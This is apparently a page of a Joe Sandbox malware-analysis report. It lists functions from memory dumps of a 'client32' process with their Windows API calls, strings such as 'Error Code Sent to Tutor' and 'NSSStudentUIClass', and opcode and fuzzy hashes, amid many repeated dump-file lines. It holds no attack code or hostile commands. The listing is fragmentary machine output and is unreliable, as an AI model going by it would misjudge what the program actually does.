Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Prop$DeleteLongObjectWindow
String ID: Chat Window Destroyed$OnDestroy - delete m_WBFrameWnd
API String ID: 2163963939-4047192309
Opcode ID: f958c79b477abf9a0fea9acb7af46adbfcf8098553b161982d9ac6736f897051
Instruction ID: 09d21a9cb39090529c9d6542565f0688f2ad478e5cfbe18cf914d43a02743bba
Opcode Fuzzy Hash: f958c79b477abf9a0fea9acb7af46adbfcf8098553b161982d9ac6736f897051
Instruction Fuzzy Hash: C731E4B5B00701ABE350CF65D880F6FF7A6EF85718F14461DE86A5B390DB75B9008B92

Function 11143250 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00000400,?,00000000,00000000,?,00000401,?,?,?,?), ref: 111432DB
wvsprintfA.USER32(?,?,?), ref: 111432F2

Strings

ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114330A

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FormatMessagewvsprintf
String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
API String ID: 65494530-3330918973
Opcode ID: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
Instruction ID: 325346ff02c3342125f3bb2915ef43e6aa784d2796c19ba5a5be54d08933bc26
Opcode Fuzzy Hash: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
Instruction Fuzzy Hash: DA21B6B1D1422DAED710CB94DC81FEFFBBCEB44614F104169EA0993240DB75AA84CBA5

Function 1100F0F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F10B

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

std::_Xinvalid_argument.LIBCPMT ref: 1100F122

Strings

string too long, xrefs: 1100F106, 1100F11D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
Instruction ID: 820ae926dfc744509ffc298ffbf7719e1583de006a97f4842800b066cd7400cd
Opcode Fuzzy Hash: ac563746f8d289c4c30f2701c9d81f44c6154b7c84ff09c16f1d9c640ce089b7
Instruction Fuzzy Hash: BA11D632B046145BE321DD5CE880BAAF7EDEF966A4F10066FF591CB640CBA1A80593A1

Function 11141430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11141496

Strings

:, xrefs: 1114146B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandFileModuleNameStrings
String ID: :
API String ID: 2034136378-336475711
Opcode ID: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
Instruction ID: d12c9fbe21fce9ebe84299b8ab088ed5ba47cc188f1fd16cec63c381e0116ac0
Opcode Fuzzy Hash: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
Instruction Fuzzy Hash: 90213774E043599BDB11CF68CC44BDAF7785B11708F1482D8D69497142DB707688CBA1

Function 111077C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 111077FF

Strings

Error code %d not sent to Tutor, xrefs: 11107858
Error Code Sent to Tutor is %d, xrefs: 111077E5

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset
String ID: Error Code Sent to Tutor is %d$Error code %d not sent to Tutor
API String ID: 2102423945-1777407139
Opcode ID: 6bc18a6fb9de46a97dd7de0579a1005d3e50091a7a43bae75e928ee118e5710d
Instruction ID: 05f70618fc24f81ca1bf2eac47fe3f2b07301d45d4df9eaa1a4e9a8d01a2e45f
Opcode Fuzzy Hash: 6bc18a6fb9de46a97dd7de0579a1005d3e50091a7a43bae75e928ee118e5710d
Instruction Fuzzy Hash: A6110A35A0112CABDB10DF64DC41FEAF778EF45708F1040EAEE089B240DA316A44CB95

Function 110633A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,CF3D35D0,?,?,00000000,00000000,1117DF28,000000FF,?,1107076F,00000000), ref: 110633FE

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

event, xrefs: 11063415
..\ctl32\Connect.cpp, xrefs: 11063410

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateErrorEventExitLastMessageProcesswsprintf
String ID: ..\ctl32\Connect.cpp$event
API String ID: 3621156866-397488498
Opcode ID: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
Instruction ID: 1e179fcce89b41eecb28e868e3bc3d371cf40be5e8a1825c7246c0f04d2a5f7d
Opcode Fuzzy Hash: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
Instruction Fuzzy Hash: 02115AB5A04715AFD720CF59C841B5AFBE8EB44B14F008A6AF8259B780DBB5A6048B90

Function 11019140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11019155

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

_memmove.LIBCMT ref: 11019184

Strings

vector<T> too long, xrefs: 11019150

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
Instruction ID: 308c0151805cc611b22231fe70dd9f684293cd40c739421a1377831650370b76
Opcode Fuzzy Hash: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
Instruction Fuzzy Hash: 6E0192B2E012059FD724CE69DC808A7B7E9EB95314715CA2EE59687704EA70F940CB90

Function 11127630 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?), ref: 11127657

Part of subcall function 11126A80: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 11126AA5

Strings

FALSE, xrefs: 111276A7
..\CTL32\tasklist.cpp, xrefs: 111276A2

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProcVersion
String ID: ..\CTL32\tasklist.cpp$FALSE
API String ID: 2540053943-3916168320
Opcode ID: 7cf0fbf2ecdb9e986a17d81715b050cbf5b30d4b869c24cc6055d1c67245c011
Instruction ID: e47c166634694b78a4fd032270d1423d3e397b229aecb58c970ebfb0a924349a
Opcode Fuzzy Hash: 7cf0fbf2ecdb9e986a17d81715b050cbf5b30d4b869c24cc6055d1c67245c011
Instruction Fuzzy Hash: 5801D430E0012D9BDB60DFA8A9417AEF3A8DB05208F9080E9DC0ADB680DF316E448781

Function 1100B580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

Error. NULL capbuf, xrefs: 1100B591
Error. preventing capbuf overflow, xrefs: 1100B5B6

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: Error. NULL capbuf$Error. preventing capbuf overflow
API String ID: 0-3856134272
Opcode ID: b100d5d4233022e8e44f9cc269860516e9a81280fef5c0ee83371a58609a8e05
Instruction ID: b2f01cc33cf96cd7d64b71e3bc45feb1f3f5f8ef4c82cb259c390b308aa88610
Opcode Fuzzy Hash: b100d5d4233022e8e44f9cc269860516e9a81280fef5c0ee83371a58609a8e05
Instruction Fuzzy Hash: EC012BBAE0060997DB10CE55F800ADBB398DFC037DF04883AEA5E93501E231F5D18692

Function 110D12D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110D12E3

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

_memmove.LIBCMT ref: 110D1308

Strings

vector<T> too long, xrefs: 110D12DE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: vector<T> too long
API String ID: 1785806476-3788999226
Opcode ID: 70da0191b5718e9e378a282df170df22699940ec89f022486c233822fbc6cd1e
Instruction ID: facce5f6267de455672404faedde13971752726d79346e18a4f89ee43adb8f58
Opcode Fuzzy Hash: 70da0191b5718e9e378a282df170df22699940ec89f022486c233822fbc6cd1e
Instruction Fuzzy Hash: BF014FB6A007055FD720DE6DD880DA7F7E8EF95658310862EE5A6C3644EE31F9508AA0

Function 11053470 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 110534D1

Strings

IgnoreBroadcastMsg, xrefs: 110534AD
Client, xrefs: 110534B2

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: Client$IgnoreBroadcastMsg
API String ID: 269201875-2698719660
Opcode ID: 406f8391fbd20ee1c0b2c9e892d905c69960e8590cde297a0bd1aef1293b93f6
Instruction ID: 7f2d190c9cc5e7471165cdc2c35737031f60f48fc0dccb1818e423c3a41c3cb6
Opcode Fuzzy Hash: 406f8391fbd20ee1c0b2c9e892d905c69960e8590cde297a0bd1aef1293b93f6
Instruction Fuzzy Hash: CC01F976E0511A96DBC1DEA5EC81B5BB79C9F42318F044471E919DA185FE30F8408B72

Function 1103F650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 1103F670
GetClassNameA.USER32(?,?,00000040), ref: 1103F681

Strings

NSSStudentUIClass, xrefs: 1103F68A

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
